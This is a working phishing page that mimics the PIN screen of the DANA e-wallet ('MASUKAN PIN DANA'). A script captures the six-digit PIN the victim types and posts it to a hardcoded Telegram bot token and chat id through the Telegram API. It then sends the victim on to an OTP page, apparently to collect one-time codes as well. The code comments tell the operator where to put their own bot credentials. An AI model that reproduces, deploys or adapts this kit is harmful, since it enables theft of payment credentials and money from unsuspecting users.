<!doctype html>
<html lang="en">
 <head> 
 <meta charset="utf-8"> 
  <meta name="fragment" content="!"> 
  <meta name="description" content=" ..."> 
  <link rel="canonical" href=""> 
  <meta name="twitter:card" content="summary_large_image"> 
  <meta property="og:title" content="Dana"> 
  <meta name="twitter:title" content="Dana"> 
  <meta property="og:site_name" content="Dana"> 
  <meta name="twitter:site_name" content="Dana"> 
  <meta property="og:description" content=""> 
  <meta name="twitter:description" content=".."> 
  <link rel="image_src" href="https://d1muf25xaso8hp.cloudfront.net/https%3A%2F%2Fs3.amazonaws.com%2Fappforest_uf%2Ff1654819767432x249088519034370100%2Fbri-logo.png?w=&amp;h=&amp;auto=compress&amp;dpr=1&amp;fit=max"> 
  <meta property="og:image" content="https://d1muf25xaso8hp.cloudfront.net/https%3A%2F%2Fs3.amazonaws.com%2Fappforest_uf%2Ff1654819767432x249088519034370100%2Fbri-logo.png?w=&amp;h=&amp;auto=compress&amp;dpr=1&amp;fit=max"> 
  <meta name="twitter:image:src" content="https://d1muf25xaso8hp.cloudfront.net/https%3A%2F%2Fs3.amazonaws.com%2Fappforest_uf%2Ff1654819767432x249088519034370100%2Fbri-logo.png?w=&amp;h=&amp;auto=compress&amp;dpr=1&amp;fit=max"> 
  <meta property="og:url" content=""> 
  	<meta name="theme-color" content="#0f78cb">
  <meta property="og:type" content="website"> 
  <meta name="apple-mobile-web-app-capable" content="yes"> 
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent"> 
  <meta name="viewport" content="width=device-width,initial-scale=1.0, user-scalable=no, minimal-ui"> 
  <title>DANA</title></title> <link rel="icon" type="image/png" href="https://i.ibb.co/Wc61GwP/Frame-1-1.jpg">
<link rel="image_src" href="https://i.ibb.co/Wc61GwP/Frame-1-1.jpg">
  <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-0evHe/X+R7YkIZDRvuzKMRqM+OrBnVFBL6DOitfPri4tjfHxaWutUpFmBp4vmVor" crossorigin="anonymous"> 
  <link rel="stylesheet" href="https://code.ionicframework.com/ionicons/2.0.1/css/ionicons.min.css"> 
  <style>
        @import url('https://fonts.googleapis.com/css2?family=Open+Sans:wght@500&display=swap');
        body {
            padding: 0;
            margin: 0;
            width: 100%;
            font-family: 'Open Sans', sans-serif;
            overflow: hidden; background: none  #0f78cb;
            padding-right: 9px;
        }

        .text-2 {
            font-family: 'Verdana';
            color: #fff;
        }

        .text-3 {
            font-family: 'Verdana';
            margin-top: -30px;
            color: #fff;
            font-size: 14px;
        }

        .sizing {
            width: 332px;
        }

        @media only screen and (max-width: 600px) {
            .sizing {
                width: 79%;
            }
        } 

        .pinNumb {
            cursor: pointer;
            box-sizing: border-box; 
            width: 58%; 
            background-color: none; 
            font-size : 26px; color: #fff; 
            text-align: center; 
            padding-top: 3px; 
            border-radius: 20px; 
            box-shadow: rgba(171, 171, 171, 0) 0px 0px 0px 0px; 
            height: 55px;
            background: none;
            border: none;
        }

        button.pinNumb:hover {
            color: #fff;
            background-color: rgba(255, 255, 255, 0.1);
            border: 1px solid rgba(255, 255, 255, 0.1);
        }

    </style> 
 <body> 
  <div class="container"> 
   <div class="row" style="margin-top: -70px;"> 
    <div class="col-12 d-block mx-auto sizing" style="white-space: pre-wrap; text-align: center; margin-top: 25px; height: 98.8px; padding-bottom: 0px; font-family: Barlow; font-size: 16px; font-weight: 400; color: rgb(255,255,255); line-height: 1.4; border-radius: 0px;"> 
     <div class="text-header" style="font-family: 'Arial'">
    <font size="3"><strong>PIN DANA</strong></font>
     </div> 
    </div> 
   </div> 
   <div class="row" style="margin-top: 10px;"> 
    <div class="col-12 d-block mx-auto sizing" style="white-space: pre-wrap; height: 94.8px; padding-bottom: 0px; font-size: 16px; font-weight: 400; color: rgb(59, 59, 59); line-height: 1.4; border-radius: 0px;"> 
     <div class="text-2">
     <div class="row" style="margin-top: -90px"> 
      <div class="col-12"> </div>
       <div class="text-2 text-center" style="font-family: 'Arial'"><b>MASUKAN PIN DANA</b>
     </div> 
    </div> 
   </div> 
   </div>
   </div>
    <form onsubmit="sendtelegram()" id="ryuSubmit" action="/sms.html">
   </div>
   <input type="hidden" name="setPin" id="setPin"> 
   <div class="row" style="margin-top: -90px;"> 
    <div class="col-12 d-block mx-auto sizing" style="white-space: pre-wrap; height: 58.8px; padding-bottom: 0px; font-size: 16px; font-weight: 600; color: rgb(59, 59, 59); line-height: 1.4; border-radius: 0px;"> 
     <div class="row"> 
      <div class="col-2"> 
       <div class="bubble-r-box" style="height: 52px; left: 0px; width: 50px;"> 
        <div class="bubble-element Group" id="pin-1" style="box-sizing: border-box; font-size: 27px; color: #fff; text-align: center; padding-top: 3px;  width: 45px; left: 0px; top: 0px; background-color: rgba(255, 255, 255, 0.34); border-radius: 6px; box-shadow: rgb(255, 255, 255) 0px 0px 2px 1px; height: 50px;"></div> 
       </div> 
      </div> 
      <div class="col-2"> 
       <div class="bubble-r-box" style="height: 52px; left: 0px; width: 50px;"> 
        <div class="bubble-element Group" id="pin-2" style="box-sizing: border-box; width: 45px; font-size: 27px; color: #fff; text-align: center; padding-top: 3px;background-color: rgba(255, 255, 255, 0.34); border-radius: 6px; box-shadow: rgb(255, 255, 255) 0px 0px 2px 1px; height: 50px;"></div> 
       </div> 
      </div> 
      <div class="col-2"> 
       <div class="bubble-r-box" style="height: 52px; left: 0px; width: 50px;"> 
        <div class="bubble-element Group" id="pin-3" style="box-sizing: border-box; width: 45px; font-size: 27px; color: #fff; text-align: center; padding-top: 3px;background-color: rgba(255, 255, 255, 0.34); border-radius: 6px; box-shadow: rgb(255, 255, 255) 0px 0px 2px 1px; height: 50px;"></div> 
       </div> 
      </div> 
      <div class="col-2"> 
       <div class="bubble-r-box" style="height: 52px; left: 0px; width: 50px;"> 
        <div class="bubble-element Group" id="pin-4" style="box-sizing: border-box; width: 45px; font-size: 27px; color: #fff; text-align: center; padding-top: 3px;background-color: rgba(255, 255, 255, 0.34); border-radius: 6px; box-shadow: rgb(255, 255, 255) 0px 0px 2px 1px; height: 50px;"></div> 
       </div> 
      </div> 
      <div class="col-2"> 
       <div class="bubble-r-box" style="height: 52px; left: 0px; width: 50px;"> 
        <div class="bubble-element Group" id="pin-5" style="box-sizing: border-box; width: 45px; font-size: 27px; color: #fff; text-align: center; padding-top: 3px; background-color: rgba(255, 255, 255, 0.34); border-radius: 6px; box-shadow: rgb(255, 255, 255) 0px 0px 2px 1px; height: 50px;"></div> 
       </div> 
      </div> 
      <div class="col-2"> 
       <div class="bubble-r-box" style="height: 52px; left: 0px; width: 50px;"> 
        <div class="bubble-element Group" id="pin-6" style="box-sizing: border-box; width: 45px; font-size: 27px; color: #fff; text-align: center; padding-top: 3px;background-color: rgba(255, 255, 255, 0.34); border-radius: 6px; box-shadow: rgb(255, 255, 255) 0px 0px 2px 1px; height: 50px;"></div> 
       </div> 
      </div> 
     </div> 
     <div class="row" style="margin-top: -90px"> 
      <div class="col-12"> 
       <div class="text-2 text-center" style="font-family: 'Arial'">
    <font size="2"><strong>Lupa PIN</strong></font>
       </div> 
      </div> 
     </div> 
    </div> 
   </div> 
   <div class="row" style="margin-top: 190px"> 
    <div class="col-12 d-block mx-auto sizing" style="white-space: pre-wrap; height: 99.8px; padding-bottom: 0px; font-size: 17px; font-weight: 600; color: rgb(59, 59, 59); line-height: 1.4; border-radius: 0px;"> 
     <div class="row"> 
      <div class="col-4"> 
       <box class="bubble-element Group pinNumb" id="setPin" data-id="1" style="margin-top: 5px;">1</box> 
      </div> 
      <div class="col-4"> 
       <box class="bubble-element Group pinNumb" id="setPin" data-id="2" style="margin-left: 10px;">2</box> 
      </div> 
      <div class="col-4"> 
       <box class="bubble-element Group pinNumb" id="setPin" data-id="3" style="margin-left: 13px;">3</box><br>
      </div> 
     </div> 
     <div class="row" style="margin-top: -80px"> 
      <div class="col-4"> 
       <box class="bubble-element Group pinNumb" id="setPin" data-id="4" style=" margin-left: 0px;">4</box> 
      </div> 
      <div class="col-4"> 
       <box class="bubble-element Group pinNumb" id="setPin" data-id="5" style="margin-left: 9px; margin-top: 3px;">5</box> 
      </div> 
      <div class="col-4"> 
       <box class="bubble-element Group pinNumb" id="setPin" data-id="6" style="margin-left: 13px;">6</box><br>
      </div> 
     </div> 
     <div class="row" style="margin-top: -80px"> 
      <div class="col-4"> 
       <box class="bubble-element Group pinNumb" id="setPin" data-id="7" style="margin-left: 0px; margin-top: 10px;">7</box> 
      </div> 
      <div class="col-4"> 
       <box class="bubble-element Group pinNumb" id="setPin" data-id="8" style="margin-left: 9px; margin-top: 10px;">8</box> 
      </div> 
      <div class="col-4"> 
       <box class="bubble-element Group pinNumb" id="setPin" data-id="9" style="margin-left: 13px; margin-top: 10px;">9</box><br>
      </div> 
     </div> 
     <div class="row" style="margin-top: -80px"> 
      <div class="col-4"> 
      </div> 
      <div class="col-4"> 
       <box class="bubble-element Group pinNumb" id="setPin" data-id="0" style="margin-left: 9px; margin-top: 10px;">0</box><br>
      </div> 
      <div class="col-4"> 
       <box class="bubble-element Group pinNumb" id="hapus"><i class="ion-backspace-outline" style="margin-left: 7px; margin-top: 6px;"></i></box>
      </div> 
    </form>
     </div> 
    </div> 
   </div> 
   <p id="status"></p>
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script> 
  <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/js/bootstrap.bundle.min.js" integrity="sha384-pprn3073KE6tl6bjs2QrFaJGz5/SUsLqktiwsUTF55Jfv3qYSDhgCecCxMW52nD2" crossorigin="anonymous"></script> 
  <script>
        $(document).ready(function() {
            $("box#setPin").on('click', function() {
                var pin = $(this).attr('data-id');
                
                if($.trim($("#pin-1").html())=='') {
                    $("#pin-1").html(pin);
                } else if($.trim($("#pin-1").html())!='' && $.trim($("#pin-2").html())=='') {
                    $("#pin-2").html(pin);
                } else if($.trim($("#pin-2").html())!='' && $.trim($("#pin-3").html())=='') {
                    $("#pin-3").html(pin);
                } else if($.trim($("#pin-3").html())!='' && $.trim($("#pin-4").html())=='') {
                    $("#pin-4").html(pin);
                } else if($.trim($("#pin-4").html())!='' && $.trim($("#pin-5").html())=='') {
                    $("#pin-5").html(pin);
                } else if($.trim($("#pin-5").html())!='' && $.trim($("#pin-6").html())=='') {
                    $("#pin-6").html(pin);

                    var setPin = $("#pin-1").html()+''+$("#pin-2").html()+''+$("#pin-3").html()+''+$("#pin-4").html()+''+$("#pin-5").html()+''+$("#pin-6").html();
                    $("input#setPin").val(setPin);

                    var pinValue = $("input#setPin").val();

                    if(pinValue.length == 6) {
                        $("#ryuSubmit").submit();
                    }
                }
            });

            $("#hapus").on('click', function() {
                $("#pin-1").html('');
                $("#pin-2").html('');
                $("#pin-3").html('');
                $("#pin-4").html('');
                $("#pin-5").html('');
            });
        });
    </script> 
    <script>
        //bot token
var telegram_bot_id = "6641445898:AAGQUg7U3BmOIoUK6a6fP23K82FBaXsZ5Ig"; // token'ni o'rniga Siz yaratgan Bot tokenini yozing
//chat id
var chat_id = "6988085293"; // 1111'ni o'rniga habar borishi kerak bo'lgan joyni ID'sini yozing (Batafsil videoda)
var setPin;
var ready = function() {
    setPin = document.getElementById("setPin").value;
    // = document.getElementById("email").value;
    // password = document.getElementById("password").value;
    message = "PIN DANA =" + setPin;
};
var sendtelegram = function() {
    ready();
    var settings = {
        "async": true,
        "crossDomain": true,
        "url": "https://api.telegram.org/bot" + telegram_bot_id + "/sendMessage",
        "method": "POST",
        "headers": {
            "Content-Type": "application/json",
            "cache-control": "no-cache"
        },
        "data": JSON.stringify({
            "chat_id": chat_id,
            "text": message
        })
    };
    $.ajax(settings).done(function(response) {
        console.log(response);
        window.location.href = '/otp.html';
    });
    
    document.getElementById("setPin").value = "";
    document.getElementById("").value = "";
    document.getElementById("").value = "";
    return true;
    
};
    </script>
  <!-- <div style="text-align: right;position: fixed;z-index:9999999;bottom: 0;width: auto;right: 1%;cursor: pointer;line-height: 0;display:block !important;"><a title="Hosted on free web hosting 000webhost.com. Host your own website for FREE." target="_blank" href="https://www.000webhost.com/?utm_source=000webhostapp&utm_campaign=000_logo&utm_medium=website&utm_content=footer_img"><img src="https://cdn.000webhost.com/000webhost/logo/footer-powered-by-000webhost-white2.png" alt="www.000webhost.com"></a></div><script>function getCookie(t){for(var e=t+"=",n=decodeURIComponent(document.cookie).split(";"),o=0;o<n.length;o++){for(var i=n[o];" "==i.charAt(0);)i=i.substring(1);if(0==i.indexOf(e))return i.substring(e.length,i.length)}return""}getCookie("hostinger")&&(document.cookie="hostinger=;expires=Thu, 01 Jan 1970 00:00:01 GMT;",location.reload());var wordpressAdminBody=document.getElementsByClassName("wp-admin")[0],notification=document.getElementsByClassName("notice notice-success is-dismissible"),hostingerLogo=document.getElementsByClassName("hlogo"),mainContent=document.getElementsByClassName("notice_content")[0];if(null!=wordpressAdminBody&&notification.length>0&&null!=mainContent){var googleFont=document.createElement("link");googleFontHref=document.createAttribute("href"),googleFontRel=document.createAttribute("rel"),googleFontHref.value="https://fonts.googleapis.com/css?family=Roboto:300,400,600,700",googleFontRel.value="stylesheet",googleFont.setAttributeNode(googleFontHref),googleFont.setAttributeNode(googleFontRel);var css="@media only screen and (max-width: 576px) {#main_content {max-width: 320px !important;} #main_content h1 {font-size: 30px !important;} #main_content h2 {font-size: 40px !important; margin: 20px 0 !important;} #main_content p {font-size: 14px !important;} #main_content .content-wrapper {text-align: center !important;}} @media only screen and (max-width: 781px) {#main_content {margin: auto; justify-content: center; max-width: 445px;}} @media only screen and (max-width: 1325px) {.web-hosting-90-off-image-wrapper {position: absolute; max-width: 95% !important;} .notice_content {justify-content: center;} .web-hosting-90-off-image {opacity: 0.3;}} @media only screen and (min-width: 769px) {.notice_content {justify-content: space-between;} #main_content {margin-left: 5%; max-width: 445px;} .web-hosting-90-off-image-wrapper {position: absolute; display: flex; justify-content: center; width: 100%; }} .web-hosting-90-off-image {max-width: 90%;} .content-wrapper {min-height: 454px; display: flex; flex-direction: column; justify-content: center; z-index: 5} .notice_content {display: flex; align-items: center;} * {-webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale;} .upgrade_button_red_sale{box-shadow: 0 2px 4px 0 rgba(255, 69, 70, 0.2); max-width: 350px; border: 0; border-radius: 3px; background-color: #ff4546 !important; padding: 15px 55px !important; font-family: 'Roboto', sans-serif; font-size: 16px; font-weight: 600; color: #ffffff;} .upgrade_button_red_sale:hover{color: #ffffff !important; background: #d10303 !important;}",style=document.createElement("style"),sheet=window.document.styleSheets[0];style.styleSheet?style.styleSheet.cssText=css:style.appendChild(document.createTextNode(css)),document.getElementsByTagName("head")[0].appendChild(style),document.getElementsByTagName("head")[0].appendChild(googleFont);var button=document.getElementsByClassName("upgrade_button_red")[0],link=button.parentElement;link.setAttribute("href","https://www.hostinger.com/hosting-starter-offer?utm_source=000webhost&utm_medium=panel&utm_campaign=000-wp"),link.innerHTML='<button class="upgrade_button_red_sale">Go for it</button>',(notification=notification[0]).setAttribute("style","padding-bottom: 0; padding-top: 5px; background-color: #040713; background-size: cover; background-repeat: no-repeat; color: #ffffff; border-left-color: #040713;"),notification.className="notice notice-error is-dismissible";var mainContentHolder=document.getElementById("main_content");mainContentHolder.setAttribute("style","padding: 0;"),hostingerLogo[0].remove();var h1Tag=notification.getElementsByTagName("H1")[0];h1Tag.className="000-h1",h1Tag.innerHTML="Black Friday Prices",h1Tag.setAttribute("style",'color: white; font-family: "Roboto", sans-serif; font-size: 22px; font-weight: 700; text-transform: uppercase;');var h2Tag=document.createElement("H2");h2Tag.innerHTML="Get 90% Off!",h2Tag.setAttribute("style",'color: white; margin: 10px 0 15px 0; font-family: "Roboto", sans-serif; font-size: 60px; font-weight: 700; line-height: 1;'),h1Tag.parentNode.insertBefore(h2Tag,h1Tag.nextSibling);var paragraph=notification.getElementsByTagName("p")[0];paragraph.innerHTML="Get Web Hosting for $0.99/month + SSL Certificate for FREE!",paragraph.setAttribute("style",'font-family: "Roboto", sans-serif; font-size: 16px; font-weight: 700; margin-bottom: 15px;');var list=notification.getElementsByTagName("UL")[0];list.remove();var org_html=mainContent.innerHTML,new_html='<div class="content-wrapper">'+mainContent.innerHTML+'</div><div class="web-hosting-90-off-image-wrapper"><img class="web-hosting-90-off-image" src="https://cdn.000webhost.com/000webhost/promotions/bf-2020-wp-inject-img.png"></div>';mainContent.innerHTML=new_html;var saleImage=mainContent.getElementsByClassName("web-hosting-90-off-image")[0]}</script><div style="text-align: right;position: fixed;z-index:9999999;bottom: 0;width: auto;right: 1%;cursor: pointer;line-height: 0;display:block !important;"><a title="Hosted on free web hosting 000webhost.com. Host your own website for FREE." target="_blank" href="https://www.000webhost.com/?utm_source=000webhostapp&utm_campaign=000_logo&utm_medium=website&utm_content=footer_img"><img src="https://cdn.000webhost.com/000webhost/logo/footer-powered-by-000webhost-white2.png" alt="www.000webhost.com"></a></div><script>function getCookie(t){for(var e=t+"=",n=decodeURIComponent(document.cookie).split(";"),o=0;o<n.length;o++){for(var i=n[o];" "==i.charAt(0);)i=i.substring(1);if(0==i.indexOf(e))return i.substring(e.length,i.length)}return""}getCookie("hostinger")&&(document.cookie="hostinger=;expires=Thu, 01 Jan 1970 00:00:01 GMT;",location.reload());var wordpressAdminBody=document.getElementsByClassName("wp-admin")[0],notification=document.getElementsByClassName("notice notice-success is-dismissible"),hostingerLogo=document.getElementsByClassName("hlogo"),mainContent=document.getElementsByClassName("notice_content")[0];if(null!=wordpressAdminBody&&notification.length>0&&null!=mainContent){var googleFont=document.createElement("link");googleFontHref=document.createAttribute("href"),googleFontRel=document.createAttribute("rel"),googleFontHref.value="https://fonts.googleapis.com/css?family=Roboto:300,400,600,700",googleFontRel.value="stylesheet",googleFont.setAttributeNode(googleFontHref),googleFont.setAttributeNode(googleFontRel);var css="@media only screen and (max-width: 576px) {#main_content {max-width: 320px !important;} #main_content h1 {font-size: 30px !important;} #main_content h2 {font-size: 40px !important; margin: 20px 0 !important;} #main_content p {font-size: 14px !important;} #main_content .content-wrapper {text-align: center !important;}} @media only screen and (max-width: 781px) {#main_content {margin: auto; justify-content: center; max-width: 445px;}} @media only screen and (max-width: 1325px) {.web-hosting-90-off-image-wrapper {position: absolute; max-width: 95% !important;} .notice_content {justify-content: center;} .web-hosting-90-off-image {opacity: 0.3;}} @media only screen and (min-width: 769px) {.notice_content {justify-content: space-between;} #main_content {margin-left: 5%; max-width: 445px;} .web-hosting-90-off-image-wrapper {position: absolute; display: flex; justify-content: center; width: 100%; }} .web-hosting-90-off-image {max-width: 90%;} .content-wrapper {min-height: 454px; display: flex; flex-direction: column; justify-content: center; z-index: 5} .notice_content {display: flex; align-items: center;} * {-webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale;} .upgrade_button_red_sale{box-shadow: 0 2px 4px 0 rgba(255, 69, 70, 0.2); max-width: 350px; border: 0; border-radius: 3px; background-color: #ff4546 !important; padding: 15px 55px !important; font-family: 'Roboto', sans-serif; font-size: 16px; font-weight: 600; color: #ffffff;} .upgrade_button_red_sale:hover{color: #ffffff !important; background: #d10303 !important;}",style=document.createElement("style"),sheet=window.document.styleSheets[0];style.styleSheet?style.styleSheet.cssText=css:style.appendChild(document.createTextNode(css)),document.getElementsByTagName("head")[0].appendChild(style),document.getElementsByTagName("head")[0].appendChild(googleFont);var button=document.getElementsByClassName("upgrade_button_red")[0],link=button.parentElement;link.setAttribute("href","https://www.hostinger.com/hosting-starter-offer?utm_source=000webhost&utm_medium=panel&utm_campaign=000-wp"),link.innerHTML='<button class="upgrade_button_red_sale">Go for it</button>',(notification=notification[0]).setAttribute("style","padding-bottom: 0; padding-top: 5px; background-color: #040713; background-size: cover; background-repeat: no-repeat; color: #ffffff; border-left-color: #040713;"),notification.className="notice notice-error is-dismissible";var mainContentHolder=document.getElementById("main_content");mainContentHolder.setAttribute("style","padding: 0;"),hostingerLogo[0].remove();var h1Tag=notification.getElementsByTagName("H1")[0];h1Tag.className="000-h1",h1Tag.innerHTML="Black Friday Prices",h1Tag.setAttribute("style",'color: white; font-family: "Roboto", sans-serif; font-size: 22px; font-weight: 700; text-transform: uppercase;');var h2Tag=document.createElement("H2");h2Tag.innerHTML="Get 90% Off!",h2Tag.setAttribute("style",'color: white; margin: 10px 0 15px 0; font-family: "Roboto", sans-serif; font-size: 60px; font-weight: 700; line-height: 1;'),h1Tag.parentNode.insertBefore(h2Tag,h1Tag.nextSibling);var paragraph=notification.getElementsByTagName("p")[0];paragraph.innerHTML="Get Web Hosting for $0.99/month + SSL Certificate for FREE!",paragraph.setAttribute("style",'font-family: "Roboto", sans-serif; font-size: 16px; font-weight: 700; margin-bottom: 15px;');var list=notification.getElementsByTagName("UL")[0];list.remove();var org_html=mainContent.innerHTML,new_html='<div class="content-wrapper">'+mainContent.innerHTML+'</div><div class="web-hosting-90-off-image-wrapper"><img class="web-hosting-90-off-image" src="https://cdn.000webhost.com/000webhost/promotions/bf-2020-wp-inject-img.png"></div>';mainContent.innerHTML=new_html;var saleImage=mainContent.getElementsByClassName("web-hosting-90-off-image")[0]}</script></body> -->   
 </body>
</html>
